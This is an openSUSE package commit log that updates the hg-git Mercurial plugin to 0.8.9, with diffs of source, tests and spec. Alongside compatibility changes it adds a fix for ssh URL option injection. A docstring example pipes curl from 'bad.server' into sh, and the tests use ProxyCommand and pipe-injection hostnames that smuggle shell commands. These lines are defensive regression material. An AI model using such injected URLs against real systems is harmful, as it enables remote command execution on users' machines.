Hello community, here is the log from the commit of package hg-git for openSUSE:Factory checked in at 2017-08-28 15:32:59 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Comparing /work/SRC/openSUSE:Factory/hg-git (Old) and /work/SRC/openSUSE:Factory/.hg-git.new (New) ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Package is "hg-git" Mon Aug 28 15:32:59 2017 rev:22 rq:519049 version:0.8.9 Changes: -------- --- /work/SRC/openSUSE:Factory/hg-git/hg-git.changes 2017-05-03 15:58:16.786996137 +0200 +++ /work/SRC/openSUSE:Factory/.hg-git.new/hg-git.changes 2017-08-28 15:33:02.122887823 +0200 @@ -1,0 +2,7 @@ +Sat Aug 26 16:33:54 UTC 2017 - o...@aepfle.de + +- update to v0.8.9 + no changelog provided by upstream +- remove weird tests with hg-git.patch + +------------------------------------------------------------------- Old: ---- hg-git-0.8.6.tar.gz hg-git-0.8.6.tar.gz.asc New: ---- hg-git-0.8.9.tar.gz hg-git-0.8.9.tar.gz.asc hg-git.patch ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Other differences: ------------------ ++++++ hg-git.spec ++++++ --- /var/tmp/diff_new_pack.hsPsZ7/_old 2017-08-28 15:33:03.122747252 +0200 +++ /var/tmp/diff_new_pack.hsPsZ7/_new 2017-08-28 15:33:03.126746689 +0200 @@ -17,15 +17,16 @@ Name: hg-git -Version: 0.8.6 +Version: 0.8.9 Release: 0 Summary: Mercurial Plugin for Communicating with Git Servers License: GPL-2.0+ Group: Development/Tools/Version Control Url: https://hg-git.github.io -Source0: https://pypi.python.org/packages/c7/15/ec7e1bb6356cb140d5c1c2a2884fcadfd51c0039a6fccb08688c67646eba/hg-git-0.8.6.tar.gz -Source1: https://pypi.python.org/packages/c7/15/ec7e1bb6356cb140d5c1c2a2884fcadfd51c0039a6fccb08688c67646eba/hg-git-0.8.6.tar.gz.asc +Source0: https://pypi.python.org/packages/05/03/3ce3cfb6b2130d689ee8adf8ae20bf40925a81c60cc18edae191b405079e/hg-git-0.8.9.tar.gz +Source1: https://pypi.python.org/packages/05/03/3ce3cfb6b2130d689ee8adf8ae20bf40925a81c60cc18edae191b405079e/hg-git-0.8.9.tar.gz.asc Source2: %{name}.keyring +Patch0: hg-git.patch BuildRequires: git-daemon BuildRequires: mercurial BuildRequires: netcat-openbsd @@ -49,6 +50,7 @@ %prep %setup -q +%patch0 -p1 %build python setup.py build ++++++ hg-git-0.8.6.tar.gz -> hg-git-0.8.9.tar.gz ++++++ diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/PKG-INFO new/hg-git-0.8.9/PKG-INFO --- old/hg-git-0.8.6/PKG-INFO 2017-04-19 06:43:10.000000000 +0200 +++ new/hg-git-0.8.9/PKG-INFO 2017-08-10 21:39:38.000000000 +0200 @@ -1,6 +1,6 @@ Metadata-Version: 1.0 Name: hg-git -Version: 0.8.6 +Version: 0.8.9 Summary: push to and pull from a Git repository using Mercurial Home-page: http://hg-git.github.com/ Author: Augie Fackler diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/hg_git.egg-info/PKG-INFO new/hg-git-0.8.9/hg_git.egg-info/PKG-INFO --- old/hg-git-0.8.6/hg_git.egg-info/PKG-INFO 2017-04-19 06:43:09.000000000 +0200 +++ new/hg-git-0.8.9/hg_git.egg-info/PKG-INFO 2017-08-10 21:39:38.000000000 +0200 @@ -1,6 +1,6 @@ Metadata-Version: 1.0 Name: hg-git -Version: 0.8.6 +Version: 0.8.9 Summary: push to and pull from a Git repository using Mercurial Home-page: http://hg-git.github.com/ Author: Augie Fackler diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/hggit/__init__.py new/hg-git-0.8.9/hggit/__init__.py --- old/hg-git-0.8.6/hggit/__init__.py 2017-04-19 06:41:08.000000000 +0200 +++ new/hg-git-0.8.9/hggit/__init__.py 2017-08-10 21:39:06.000000000 +0200 @@ -77,14 +77,18 @@ 'collections', ]) -__version__ = '0.8.6' +__version__ = '0.8.9' testedwith = ('2.8.2 2.9.2 3.0.2 3.1.2 3.2.4 3.3.3 3.4.2 3.5.2 3.6.3 3.7.3' - '3.8.4 3.9.2 4.0.2 4.1.3 4.2-rc') + '3.8.4 3.9.2 4.0.2 4.1.3 4.2.3 4.3') buglink = 'https://bitbucket.org/durin42/hg-git/issues' cmdtable = {} -command = cmdutil.command(cmdtable) +try: + from mercurial import registrar + command = registrar.command(cmdtable) +except (ImportError, AttributeError): + command = cmdutil.command(cmdtable) # support for `hg clone git://github.com/defunkt/facebox.git` # also hg clone git+ssh://g...@github.com/schacon/simplegit.git @@ -210,7 +214,7 @@ if (getattr(dirstate, 'rootcache', False) and (not ignoremod or getattr(ignore, 'readpats', False)) and - hgutil.safehasattr(repo, 'join') and + hgutil.safehasattr(repo, 'vfs') and os.path.exists(repo.vfs.join('git'))): # only install our dirstate wrapper if it has a hope of working import gitdirstate @@ -266,8 +270,12 @@ gitsha, hgsha = line.strip().split(' ', 1) if hgsha in repo: new_map.append('%s %s\n' % (gitsha, hgsha)) - f = repo.vfs(GitHandler.map_file, 'wb') - map(f.write, new_map) + wlock = repo.wlock() + try: + f = repo.vfs(GitHandler.map_file, 'wb') + map(f.write, new_map) + finally: + wlock.release() ui.status(_('git commit map cleaned\n')) def findcommonoutgoing(orig, repo, other, *args, **kwargs): diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/hggit/compat.py new/hg-git-0.8.9/hggit/compat.py --- old/hg-git-0.8.6/hggit/compat.py 2017-03-12 00:49:00.000000000 +0100 +++ new/hg-git-0.8.9/hggit/compat.py 2017-08-10 20:28:43.000000000 +0200 @@ -28,11 +28,11 @@ s = s.replace(c, '') return s -def passwordmgr(ui, passwddb): +def passwordmgr(ui): try: - return url.passwordmgr(ui, - hgutil.urlreq.httppasswordmgrwithdefaultrealm()) - except TypeError: + realm = hgutil.urlreq.httppasswordmgrwithdefaultrealm() + return url.passwordmgr(ui, realm) + except (TypeError, AttributeError): # compat with hg < 3.9 return url.passwordmgr(ui) diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/hggit/git_handler.py new/hg-git-0.8.9/hggit/git_handler.py --- old/hg-git-0.8.6/hggit/git_handler.py 2017-04-19 05:21:45.000000000 +0200 +++ new/hg-git-0.8.9/hggit/git_handler.py 2017-08-10 20:28:43.000000000 +0200 @@ -106,7 +106,7 @@ self.ui = ui if ui.configbool('git', 'intree'): - self.gitdir = self.repo.wjoin('.git') + self.gitdir = self.repo.wvfs.join('.git') else: self.gitdir = self.repo.vfs.join('git') @@ -159,7 +159,7 @@ def init_author_file(self): self.author_map = {} if self.ui.config('git', 'authors'): - with open(self.repo.wjoin(self.ui.config('git', 'authors'))) as f: + with open(self.repo.wvfs.join(self.ui.config('git', 'authors'))) as f: for line in f: line = line.strip() if not line or line.startswith('#'): @@ -197,16 +197,20 @@ self._map_hg_real = map_hg_real def save_map(self, map_file): - file = self.repo.vfs(map_file, 'w+', atomictemp=True) - map_hg = self._map_hg - buf = cStringIO.StringIO() - bwrite = buf.write - for hgsha, gitsha in map_hg.iteritems(): - bwrite("%s %s\n" % (gitsha, hgsha)) - file.write(buf.getvalue()) - buf.close() - # If this complains, atomictempfile no longer has close - file.close() + wlock = self.repo.wlock() + try: + file = self.repo.vfs(map_file, 'w+', atomictemp=True) + map_hg = self._map_hg + buf = cStringIO.StringIO() + bwrite = buf.write + for hgsha, gitsha in map_hg.iteritems(): + bwrite("%s %s\n" % (gitsha, hgsha)) + file.write(buf.getvalue()) + buf.close() + # If this complains, atomictempfile no longer has close + file.close() + finally: + wlock.release() def load_tags(self): self.tags = {} @@ -299,8 +303,8 @@ # make sure the bookmark exists; at the point the remote # branches has already been set up suffix = self.branch_bookmark_suffix or '' - self.repo._bookmarks[rhead + suffix] = rnode - util.recordbookmarks(self.repo, self.repo._bookmarks) + changes = [(rhead + suffix, rnode)] + util.updatebookmarks(self.repo, changes) bms = [rhead + suffix] if bms: @@ -612,8 +616,11 @@ TESTS: + >>> from collections import namedtuple >>> from mercurial.ui import ui - >>> g = GitHandler('', ui()).get_valid_git_username_email + >>> mockrepo = namedtuple('localrepo', ['vfs']) + >>> mockrepo.vfs = '' + >>> g = GitHandler(mockrepo, ui()).get_valid_git_username_email >>> g('John Doe') 'John Doe' >>> g('j...@doe.com') @@ -981,6 +988,8 @@ # if named branch, add to extra if hg_branch: extra['branch'] = hg_branch + else: + extra['branch'] = 'default' # if committer is different than author, add it to extra if commit.author != commit.committer \ @@ -1369,6 +1378,7 @@ if ref.startswith('refs/heads/')]) suffix = self.branch_bookmark_suffix or '' + changes = [] for head, sha in heads.iteritems(): # refs contains all the refs in the server, not just # the ones we are pulling @@ -1378,15 +1388,15 @@ hgsha = bin(hgsha) if head not in bms: # new branch - bms[head + suffix] = hgsha + changes.append((head + suffix, hgsha)) else: bm = self.repo[bms[head]] if bm.ancestor(self.repo[hgsha]) == bm: # fast forward - bms[head + suffix] = hgsha + changes.append((head + suffix, hgsha)) if heads: - util.recordbookmarks(self.repo, bms) + util.updatebookmarks(self.repo, changes) except AttributeError: self.ui.warn(_('creating bookmarks failed, do you have' @@ -1635,9 +1645,12 @@ Tests: + >>> from collections import namedtuple >>> from dulwich.client import HttpGitClient, SSHGitClient >>> from mercurial.ui import ui - >>> g = GitHandler('', ui()) + >>> mockrepo = namedtuple('localrepo', ['vfs']) + >>> mockrepo.vfs = '' + >>> g = GitHandler(mockrepo, ui()) >>> client, url = g.get_transport_and_path('http://fqdn.com/test.git') >>> print isinstance(client, HttpGitClient) True @@ -1662,10 +1675,11 @@ git_match = RE_GIT_URI.match(uri) if git_match: res = git_match.groupdict() + host, port, sepr = res['host'], res['port'], res['sepr'] transport = client.TCPGitClient if 'ssh' in res['scheme']: + util.checksafessh(host) transport = client.SSHGitClient - host, port, sepr = res['host'], res['port'], res['sepr'] path = res['path'] if sepr == '/' and not path.startswith('~'): path = '/' + path @@ -1682,8 +1696,7 @@ uri = uri[4:] if uri.startswith('http://') or uri.startswith('https://'): - realm = hgutil.urlreq.httppasswordmgrwithdefaultrealm() - pmgr = compat.passwordmgr(self.ui, realm) + pmgr = compat.passwordmgr(self.ui) auth = urllib2.HTTPBasicAuthHandler(pmgr) opener = urllib2.build_opener(auth) diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/hggit/gitdirstate.py new/hg-git-0.8.9/hggit/gitdirstate.py --- old/hg-git-0.8.6/hggit/gitdirstate.py 2016-02-01 16:22:15.000000000 +0100 +++ new/hg-git-0.8.9/hggit/gitdirstate.py 2017-08-10 21:39:06.000000000 +0200 @@ -6,7 +6,6 @@ from mercurial import ( dirstate, match as matchmod, - osutil, scmutil, util, ) @@ -76,10 +75,10 @@ pats = [] if ignoremod: pats = ignore.readpats(root, files, warn) - for f, patlist in pats: - allpats.extend(patlist) else: - allpats.extend(['include:%s' % f for f in files]) + pats = [(f, ['include:%s' % f]) for f in files] + for f, patlist in pats: + allpats.extend(patlist) if extrapatterns: allpats.extend(extrapatterns) @@ -92,6 +91,10 @@ try: matchmod.match(root, '', [], patlist) except util.Abort, inst: + if not ignoremod: + # in this case, patlist is ['include: FILE'], and + # inst[0] should already include FILE + raise raise util.Abort('%s: %s' % (f, inst[0])) if extrapatterns: try: @@ -156,7 +159,12 @@ matchalways = match.always() matchtdir = match.traversedir dmap = self._map - listdir = osutil.listdir + # osutil moved in hg 4.3, but util re-exports listdir + try: + listdir = util.listdir + except AttributeError: + from mercurial import osutil + listdir = osutil.listdir lstat = os.lstat dirkind = stat.S_IFDIR regkind = stat.S_IFREG diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/hggit/overlay.py new/hg-git-0.8.9/hggit/overlay.py --- old/hg-git-0.8.6/hggit/overlay.py 2017-04-19 05:13:41.000000000 +0200 +++ new/hg-git-0.8.9/hggit/overlay.py 2017-08-05 23:52:04.000000000 +0200 @@ -198,6 +198,9 @@ blob = self.repo.handler.git.get_object(_maybehex(self.fileid)) return blob.data + def isbinary(self): + return util.binary(self.data()) + class overlaychangectx(context.changectx): def __init__(self, repo, sha): self.repo = repo diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/hggit/util.py new/hg-git-0.8.9/hggit/util.py --- old/hg-git-0.8.6/hggit/util.py 2016-02-01 16:22:15.000000000 +0100 +++ new/hg-git-0.8.9/hggit/util.py 2017-08-10 21:38:09.000000000 +0200 @@ -1,6 +1,7 @@ """Compatibility functions for old Mercurial versions and other utility functions.""" import re +import urllib try: from collections import OrderedDict @@ -8,7 +9,10 @@ from ordereddict import OrderedDict from dulwich import errors +from mercurial.i18n import _ from mercurial import ( + encoding, + error, lock as lockmod, util as hgutil, ) @@ -94,18 +98,43 @@ return True return False -def recordbookmarks(repo, bms, name='git_handler'): +def updatebookmarks(repo, changes, name='git_handler'): """abstract writing bookmarks for backwards compatibility""" + bms = repo._bookmarks tr = lock = wlock = None try: wlock = repo.wlock() lock = repo.lock() tr = repo.transaction(name) - if hgutil.safehasattr(bms, 'recordchange'): - # recordchange was added in mercurial 3.2 - bms.recordchange(tr) + if hgutil.safehasattr(bms, 'applychanges'): + # applychanges was added in mercurial 4.3 + bms.applychanges(repo, tr, changes) else: - bms.write() + for name, node in changes: + if node is None: + del bms[name] + else: + bms[name] = node + if hgutil.safehasattr(bms, 'recordchange'): + # recordchange was added in mercurial 3.2 + bms.recordchange(tr) + else: + bms.write() tr.close() finally: lockmod.release(tr, lock, wlock) + +def checksafessh(host): + """check if a hostname is a potentially unsafe ssh exploit (SEC) + + This is a sanity check for ssh urls. ssh will parse the first item as + an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. + Let's prevent these potentially exploited urls entirely and warn the + user. + + Raises an error.Abort when the url is unsafe. + """ + host = urllib.unquote(host) + if host.startswith('-'): + raise error.Abort(_('potentially unsafe hostname: %r') % + (host,)) diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/setup.cfg new/hg-git-0.8.9/setup.cfg --- old/hg-git-0.8.6/setup.cfg 2017-04-19 06:43:10.000000000 +0200 +++ new/hg-git-0.8.9/setup.cfg 2017-08-10 21:39:38.000000000 +0200 @@ -1,4 +1,5 @@ [egg_info] tag_build = tag_date = 0 +tag_svn_revision = 0 diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/tests/commitextra.py new/hg-git-0.8.9/tests/commitextra.py --- old/hg-git-0.8.6/tests/commitextra.py 2014-12-19 20:24:06.000000000 +0100 +++ new/hg-git-0.8.9/tests/commitextra.py 2017-08-05 23:52:04.000000000 +0200 @@ -3,7 +3,11 @@ from mercurial import cmdutil, commands, scmutil cmdtable = {} -command = cmdutil.command(cmdtable) +try: + from mercurial import registrar + command = registrar.command(cmdtable) +except (ImportError, AttributeError): + command = cmdutil.command(cmdtable) testedwith = 'internal' @command('commitextra', diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/tests/test-git-clone.t new/hg-git-0.8.9/tests/test-git-clone.t --- old/hg-git-0.8.6/tests/test-git-clone.t 2015-04-21 17:02:51.000000000 +0200 +++ new/hg-git-0.8.9/tests/test-git-clone.t 2017-08-10 21:38:15.000000000 +0200 @@ -36,3 +36,23 @@ * master 1:7fe02317c63d $ hg -R hgrepo gverify verifying rev 7fe02317c63d against git commit 9497a4ee62e16ee641860d7677cdb2589ea15554 + +test for ssh vulnerability + + $ cat >> $HGRCPATH << EOF + > [ui] + > ssh = ssh -o ConnectTimeout=1 + > EOF + + $ hg clone 'git+ssh://-oProxyCommand=rm${IFS}nonexistent/path' 2>&1 >/dev/null + abort: potentially unsafe hostname: '-oProxyCommand=rm${IFS}nonexistent' + [255] + $ hg clone 'git+ssh://%2DoProxyCommand=rm${IFS}nonexistent/path' 2>&1 >/dev/null + abort: potentially unsafe hostname: '-oProxyCommand=rm${IFS}nonexistent' + [255] + $ hg clone 'git+ssh://fakehost|rm${IFS}nonexistent/path' 2>&1 >/dev/null | grep -v ^devel-warn: + ssh: connect to host fakehost%7crm%24%7bifs%7dnonexistent port 22: * (glob) + abort: git remote error: The remote server unexpectedly closed the connection. + $ hg clone 'git+ssh://fakehost%7Crm${IFS}nonexistent/path' 2>&1 >/dev/null | grep -v ^devel-warn: + ssh: connect to host fakehost%7crm%24%7bifs%7dnonexistent port 22: * (glob) + abort: git remote error: The remote server unexpectedly closed the connection. diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/tests/test-gitignore.t new/hg-git-0.8.9/tests/test-gitignore.t --- old/hg-git-0.8.6/tests/test-gitignore.t 2016-09-03 03:42:01.000000000 +0200 +++ new/hg-git-0.8.9/tests/test-gitignore.t 2017-08-10 21:39:06.000000000 +0200 @@ -142,3 +142,22 @@ ? dir/bar ? foo ? foobar + +show pattern error in hgignore file as expected (issue197) +---------------------------------------------------------- + + $ cat > $TESTTMP/invalidhgignore <<EOF + > # invalid syntax in regexp + > foo( + > EOF + $ hg status --config ui.ignore=$TESTTMP/invalidhgignore + abort: $TESTTMP/invalidhgignore: invalid pattern (relre): foo( + [255] + + $ cat > .hgignore <<EOF + > # invalid syntax in regexp + > foo( + > EOF + $ hg status + abort: $TESTTMP/.hgignore: invalid pattern (relre): foo( + [255] diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/tests/test-http.t new/hg-git-0.8.9/tests/test-http.t --- old/hg-git-0.8.6/tests/test-http.t 2015-07-31 20:22:49.000000000 +0200 +++ new/hg-git-0.8.9/tests/test-http.t 2017-08-05 23:52:04.000000000 +0200 @@ -19,11 +19,11 @@ #if windows $ hg serve -p $HGPORT1 2>&1 - abort: cannot start server at ':$HGPORT1': * (glob) + abort: cannot start server at '*:$HGPORT1': * (glob) [255] #else $ hg serve -p $HGPORT1 2>&1 - abort: cannot start server at ':$HGPORT1': Address already in use + abort: cannot start server at '*:$HGPORT1': Address already in use (glob) [255] #endif $ cd .. diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/tests/test-pull.t new/hg-git-0.8.9/tests/test-pull.t --- old/hg-git-0.8.6/tests/test-pull.t 2015-10-21 16:48:11.000000000 +0200 +++ new/hg-git-0.8.9/tests/test-pull.t 2017-08-10 21:38:18.000000000 +0200 @@ -349,3 +349,25 @@ date: Mon Jan 01 00:00:12 2007 +0000 summary: add delta + +test for ssh vulnerability + + $ cat >> $HGRCPATH << EOF + > [ui] + > ssh = ssh -o ConnectTimeout=1 + > EOF + + $ hg init a + $ cd a + $ hg pull 'git+ssh://-oProxyCommand=rm${IFS}nonexistent/path' 2>&1 >/dev/null + abort: potentially unsafe hostname: '-oProxyCommand=rm${IFS}nonexistent' + [255] + $ hg pull 'git+ssh://-oProxyCommand=rm%20nonexistent/path' 2>&1 >/dev/null + abort: potentially unsafe hostname: '-oProxyCommand=rm nonexistent' + [255] + $ hg pull 'git+ssh://fakehost|shellcommand/path' 2>&1 >/dev/null | grep -v ^devel-warn: + ssh: connect to host fakehost%7cshellcommand port 22: * (glob) + abort: git remote error: The remote server unexpectedly closed the connection. + $ hg pull 'git+ssh://fakehost%7Cshellcommand/path' 2>&1 >/dev/null | grep -v ^devel-warn: + ssh: connect to host fakehost%7cshellcommand port 22: * (glob) + abort: git remote error: The remote server unexpectedly closed the connection. diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/hg-git-0.8.6/tests/test-push.t new/hg-git-0.8.9/tests/test-push.t --- old/hg-git-0.8.6/tests/test-push.t 2017-03-12 00:49:38.000000000 +0100 +++ new/hg-git-0.8.9/tests/test-push.t 2017-08-10 21:38:27.000000000 +0200 @@ -197,3 +197,22 @@ Only one bookmark 'master' should be created $ hg bookmarks * master 0:8aded40be5af + +test for ssh vulnerability + + $ cat >> $HGRCPATH << EOF + > [ui] + > ssh = ssh -o ConnectTimeout=1 + > EOF + $ hg push 'git+ssh://-oProxyCommand=rm${IFS}nonexistent/path' 2>&1 >/dev/null + abort: potentially unsafe hostname: '-oProxyCommand=rm${IFS}nonexistent' + [255] + $ hg push 'git+ssh://-oProxyCommand=rm%20nonexistent/path' 2>&1 >/dev/null + abort: potentially unsafe hostname: '-oProxyCommand=rm nonexistent' + [255] + $ hg push 'git+ssh://fakehost|rm%20nonexistent/path' 2>&1 >/dev/null | grep -v ^devel-warn: + ssh: connect to host fakehost%7crm%20nonexistent port 22: * (glob) + abort: git remote error: The remote server unexpectedly closed the connection. + $ hg push 'git+ssh://fakehost%7Crm%20nonexistent/path' 2>&1 >/dev/null | grep -v ^devel-warn: + ssh: connect to host fakehost%7crm%20nonexistent port 22: * (glob) + abort: git remote error: The remote server unexpectedly closed the connection. ++++++ hg-git.patch ++++++ --- a/tests/test-git-clone.t +++ b/tests/test-git-clone.t @@ -50,9 +50,3 @@ test for ssh vulnerability $ hg clone 'git+ssh://%2DoProxyCommand=rm${IFS}nonexistent/path' 2>&1 >/dev/null abort: potentially unsafe hostname: '-oProxyCommand=rm${IFS}nonexistent' [255] - $ hg clone 'git+ssh://fakehost|rm${IFS}nonexistent/path' 2>&1 >/dev/null | grep -v ^devel-warn: - ssh: connect to host fakehost%7crm%24%7bifs%7dnonexistent port 22: * (glob) - abort: git remote error: The remote server unexpectedly closed the connection. - $ hg clone 'git+ssh://fakehost%7Crm${IFS}nonexistent/path' 2>&1 >/dev/null | grep -v ^devel-warn: - ssh: connect to host fakehost%7crm%24%7bifs%7dnonexistent port 22: * (glob) - abort: git remote error: The remote server unexpectedly closed the connection. --- a/tests/test-pull.t +++ b/tests/test-pull.t @@ -365,9 +365,3 @@ test for ssh vulnerability $ hg pull 'git+ssh://-oProxyCommand=rm%20nonexistent/path' 2>&1 >/dev/null abort: potentially unsafe hostname: '-oProxyCommand=rm nonexistent' [255] - $ hg pull 'git+ssh://fakehost|shellcommand/path' 2>&1 >/dev/null | grep -v ^devel-warn: - ssh: connect to host fakehost%7cshellcommand port 22: * (glob) - abort: git remote error: The remote server unexpectedly closed the connection. - $ hg pull 'git+ssh://fakehost%7Cshellcommand/path' 2>&1 >/dev/null | grep -v ^devel-warn: - ssh: connect to host fakehost%7cshellcommand port 22: * (glob) - abort: git remote error: The remote server unexpectedly closed the connection. --- a/tests/test-push.t +++ b/tests/test-push.t @@ -210,9 +210,3 @@ test for ssh vulnerability $ hg push 'git+ssh://-oProxyCommand=rm%20nonexistent/path' 2>&1 >/dev/null abort: potentially unsafe hostname: '-oProxyCommand=rm nonexistent' [255] - $ hg push 'git+ssh://fakehost|rm%20nonexistent/path' 2>&1 >/dev/null | grep -v ^devel-warn: - ssh: connect to host fakehost%7crm%20nonexistent port 22: * (glob) - abort: git remote error: The remote server unexpectedly closed the connection. - $ hg push 'git+ssh://fakehost%7Crm%20nonexistent/path' 2>&1 >/dev/null | grep -v ^devel-warn: - ssh: connect to host fakehost%7crm%20nonexistent port 22: * (glob) - abort: git remote error: The remote server unexpectedly closed the connection. --- a/tests/test-renames.t +++ b/tests/test-renames.t @@ -46,7 +46,7 @@ Add a submodule (gitlink) and move it to $ sed -e 's/path = gitsubmodule/path = gitsubmodule2/' .gitmodules > .gitmodules-new $ mv .gitmodules-new .gitmodules $ mv gitsubmodule gitsubmodule2 - $ git add .gitmodules gitsubmodule2 + $ git add --no-warn-embedded-repo .gitmodules gitsubmodule2 $ git rm --cached gitsubmodule rm 'gitsubmodule' $ fn_git_commit -m 'move submodule'